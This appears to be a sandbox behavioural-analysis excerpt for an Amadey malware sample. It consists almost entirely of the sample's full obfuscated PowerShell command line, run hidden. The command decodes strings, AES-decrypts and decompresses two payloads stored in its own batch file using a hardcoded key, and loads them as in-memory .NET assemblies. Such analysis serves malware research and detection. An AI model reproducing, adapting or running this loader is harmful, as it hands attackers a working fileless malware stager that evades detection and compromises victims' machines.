Behavioral Analysis

Amadey_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Amadey_SC.bat.exe" -w hidden -c $nGwm='CCjExhangCjExeECjExxteCjExnsiCjExoCjExnCjEx'.Replace('CjEx', '');$Grmc='LoCjExadCjEx'.Replace('CjEx', '');$YsJr='InCjExvokeCjEx'.Replace('CjEx', '');$AHzA='GeCjExtCurCjExrCjExentPCjExrocCjExesCjExsCjEx'.Replace('CjEx', '');$AkCJ='ECjExntCjExrCjExyCjExPoCjExinCjExtCjEx'.Replace('CjEx', '');$EJgE='TraCjExnsCjExforCjExmFiCjExnalCjExBloCjExckCjEx'.Replace('CjEx', '');$QoAk='FroCjExmBaCjExseCjEx64SCjExtriCjExngCjEx'.Replace('CjEx', '');$lLNf='ReCjExadLCjExinCjExeCjExsCjEx'.Replace('CjEx', '');$Mppd='MCjExaiCjExnMCjExoduCjExlCjExeCjEx'.Replace('CjEx', '');$lMAH='EleCjExmCjExenCjExtAtCjEx'.Replace('CjEx', '');$vHOA='CrCjExeatCjExeDCjExecrCjExypCjExtorCjEx'.Replace('CjEx', '');$nHUE='SplCjExitCjEx'.Replace('CjEx', '');function ZkNIV($dhECG){$dQobA=[System.Security.Cryptography.Aes]::Create();$dQobA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dQobA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dQobA.Key=[System.Convert]::$QoAk('U+IVH6zoRvVg+wJeW7OU/9ptKS11OAh0KPlLHNIshNI=');$dQobA.IV=[System.Convert]::$QoAk('EhMSi8SwB82vWnhueU1NaA==');$JvgRx=$dQobA.$vHOA();$ynAdD=$JvgRx.$EJgE($dhECG,0,$dhECG.Length);$JvgRx.Dispose();$dQobA.Dispose();$ynAdD;}function ghLbT($dhECG){$TGHyO=New-Object System.IO.MemoryStream(,$dhECG);$VJAyt=New-Object System.IO.MemoryStream;$ixxdS=New-Object System.IO.Compression.GZipStream($TGHyO,[IO.Compression.CompressionMode]::Decompress);$ixxdS.CopyTo($VJAyt);$ixxdS.Dispose();$TGHyO.Dispose();$VJAyt.Dispose();$VJAyt.ToArray();}$fcFDN=[System.Linq.Enumerable]::$lMAH([System.IO.File]::$lLNf([System.IO.Path]::$nGwm([System.Diagnostics.Process]::$AHzA().$Mppd.FileName, $null)), 1);$rVKhz=$fcFDN.Substring(2).$nHUE(':');$NPuxV=ghLbT (ZkNIV ([Convert]::$QoAk($rVKhz[0])));$pjujA=ghLbT (ZkNIV ([Convert]::$QoAk($rVKhz[1])));[System.Reflection.Assembly]::$Grmc([byte[]]$pjujA).$AkCJ.$YsJr($null,$null);[System.Reflection.Assembly]::$Grmc([byte[]]$NPuxV).$AkCJ.$YsJr($null,$null);